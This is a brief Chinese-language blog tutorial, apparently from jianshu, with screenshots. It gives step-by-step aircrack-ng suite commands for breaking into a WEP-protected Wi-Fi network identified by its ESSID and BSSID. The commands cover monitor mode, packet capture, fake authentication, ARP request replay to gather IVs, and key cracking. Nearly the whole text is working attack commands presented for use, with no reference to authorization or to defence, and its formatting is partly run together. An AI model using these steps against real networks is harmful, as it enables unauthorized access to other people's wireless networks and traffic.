本文共 1037 字,大约阅读时间需要 3 分钟。
airmon-ng start wlan0 [或wlan1]airserv-ng -d mon0 #开启监听模式aireplay-ng -9 127.0.0.1:666 #尝试注入服务器
airodump-ng mon0
来查看范围内的网络列表
ESSID - DIGISOL
BSSID - 00:17:7C:22:CB:80CH(通道) - 2连接到网络的正版用户的Mac地址:接口:wlan1 - 简称mon0
至少一个用户去连接到网络,产生ARP请求包,我们才能进行攻击。
aireplay-ng --test -e DIGISOL -a 00:17:7C:22:CB:80 mon0 #对目标网络测试```![image.png](http://upload-images.jianshu.io/upload_images/5145235-ebd9c9934f73b828.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)```airodump-ng -c 2 --bssid 00:17:7C:22:CB:80 -w dump mon0 #捕获数据包```>伪造身份验证```aireplay-ng -1 0 -e DIGISOL -a 00:17:7C:22:CB:80 mon0```![认证和捕获数据包](http://upload-images.jianshu.io/upload_images/5145235-4243a569067b0953.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)##ARP请求重播模式ARP数据包是获取大量IV或数据的最佳选择。没有IVs,你不能hack网络```aireplay-ng -3 -b 00:17:7C:22:CB:80 mon0 #使aireplay-ng收听AP的ARP数据包,并在找到它们后立即注入。这样会很快创建大量的数据``` ##破解网络```aircrack-ng dump-01.cap```